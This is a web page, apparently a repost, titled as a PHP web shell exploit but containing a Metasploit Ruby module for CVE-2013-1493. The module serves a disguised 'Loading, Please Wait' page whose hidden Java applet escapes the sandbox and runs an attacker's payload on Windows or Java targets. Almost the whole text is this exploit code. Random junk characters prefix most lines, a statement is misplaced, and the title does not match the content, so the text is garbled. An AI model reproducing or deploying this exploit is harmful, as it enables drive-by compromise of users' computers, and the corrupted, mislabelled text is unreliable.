STUNSHELL PHP Web Shell远程执行代码

admin

##
) ^2 ~" [5 V# ]3 z
, _* _3 ^* w/ |, U# This file is part of the Metasploit Framework and may be subject to
; d0 e* [7 X% L- w# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
7 x; H0 Q+ F, c/ Z0 O0 \& ?# http://metasploit.com/
##
- X$ c' l6 w' B$ k! a" M  Grequire ‘msf/core’
7 }. x& F9 y7 brequire ‘rex’
$ U% S5 I" J0 G# d  vclass Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
& p3 |" k, v$ `) p& G! ?! `: rinclude Msf::Exploit::Remote::HttpServer::HTML
! a. s" y4 z; {  q; t2 T- Jinclude Msf::Exploit::EXE
4 a+ l! x: f& ~' uinclude Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({ :javascript => false })
def initialize( info = {} )
$ ~0 ~0 k7 M! c2 i/ `super( update_info( info,
‘Name’ => ‘Java CMM Remote Code Execution’,
‘Description’ => %q{
This module abuses the Color Management classes from a Java Applet to run
arbitrary Java code outside of the sandbox as exploited in the wild in February
3 r8 k) s% W# ]& g5 }/ r+ X& ]and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
systems. This exploit doesn’t bypass click-to-play, so the user must accept the java
; s# J) S. u, D" wwarning in order to run the malicious applet.
},
‘License’ => MSF_LICENSE,
‘Author’ =>
: S2 U$ m8 k2 B  y& X'Unknown', # Vulnerability discovery and Exploit
'juan vazquez' # Metasploit module (just ported the published exploit)
' L& l" ?+ X; ]* V# A8 f5 e( V],
‘References’ =>
5 N) b  S: |  W; z! V. i: y4 H  g[
  ]" b7 z/ z- w2 e" k7 _. H[ 'CVE', '2013-1493' ],
4 T- @* T5 j5 K[ 'OSVDB', '90737' ],
[ 'BID', '58238' ],
$ }/ G- P: [* _/ d/ t[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
[ 'URL', 'http://pastie.org/pastes/6581034' ]
$ C) r+ b1 ~: y6 u; _0 S],
‘Platform’ => [ 'win', 'java' ],
‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },
7 _- M) `% b6 e. W* `‘Targets’ =>
7 V7 ^! d* K4 I/ W[
4 B$ N, K# t+ V# t[ 'Generic (Java Payload)',
0 K% |! A! g( ]  n{
$ Q6 s- R9 R6 }8 r'Platform' => 'java',
% S; R& `- q1 I2 ]'Arch' => ARCH_JAVA
( f2 ~. T) g& A  w' i; N/ l}
],
  f- e$ e4 f' H: X( n; E[ 'Windows x86 (Native Payload)',
{
+ w0 w. T7 A7 X+ Z'Platform' => 'win',
9 G- `% N% s: O  m4 r. a. k'Arch' => ARCH_X86
}
( j$ v1 h+ n2 P3 T& }- n5 L# `6 V]
],
‘‘DisclosureDate’ => ‘Mar 01 2013′
))
6 d& y& t* M: l! L6 C( qend
% Q- S3 `/ E2 ?8 W; [5 mdef setup
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”)
8 u+ L, i! r! T5 t! v@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”)
@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
5 Z1 d: X, K- v6 }4 _. apath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”)
@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
; `, a1 [2 u, B: a- xpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)
@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
@init_class_name = rand_text_alpha(“Init”.length)
2 f( C& Z$ D8 J% y1 _' d@init_class.gsub!(“Init”, @init_class_name)
! h0 U, A6 V/ Csuper
end
def on_request_uri(cli, request)
print_status(“handling request for #{request.uri}”)
8 y0 n8 n6 n$ l" u+ p/ l) lcase request.uri
  z8 h# g3 I/ m) a, dwhen /\.jar$/i
4 E: ^- H. l7 Wjar = payload.encoded_jar
3 [+ G5 x3 c7 n% `! I; e* y  sjar.add_file(“#{@init_class_name}.class”, @init_class)
% k0 r3 {3 F2 O( \jar.add_file(“Leak.class”, @leak_class)
% ^8 ^1 Z+ P0 q5 Vjar.add_file(“MyBufferedImage.class”, @buffered_image_class)
jar.add_file(“MyColorSpace.class”, @color_space_class)
# I* q2 g0 Y# E( w) hDefaultTarget’ => 1,
2 H+ W  H8 C5 I1 {3 n# {/ [metasploit_str = rand_text_alpha(“metasploit”.length)
payload_str = rand_text_alpha(“payload”.length)
jar.entries.each { |entry|
8 D* O+ u+ l& ]5 k% x" x5 A! eentry.name.gsub!(“metasploit”, metasploit_str)
6 A( {' I( R: V! d0 R* wentry.name.gsub!(“Payload”, payload_str)
entry.data = entry.data.gsub(“metasploit”, metasploit_str)
' R, b5 s& f, f7 Bentry.data = entry.data.gsub(“Payload”, payload_str)
}
jar.build_manifest
send_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })
7 X6 u6 `4 T2 zwhen /\/$/
! Q7 h; E! ~9 {6 Z; R  g+ mpayload = regenerate_payload(cli)
if not payload
print_error(“Failed to generate the payload.”)
: A2 X. C1 A% xsend_not_found(cli)
( a5 n( ]2 q$ i0 lreturn
" o: d* a! w* s' a2 A( qend
send_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })
else
send_redirect(cli, get_resource() + ‘/’, ”)
# ~0 R9 ^; x& H# W( _7 N' Cend
end
def generate_html
html = %Q|<html><head><title>Loading, Please Wait…</title></head>|
4 F8 {) i1 g7 Xhtml += %Q|<body><center><p>Loading, Please Wait…</p></center>|
3 `; J# [  b, I3 E: K) g6 Ihtml += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|
html += %Q|</applet></body></html>|
0 p9 ?8 h4 d0 D: `2 k# greturn html
end
end
end
% p7 G) H, U  V! a/ ]; ], n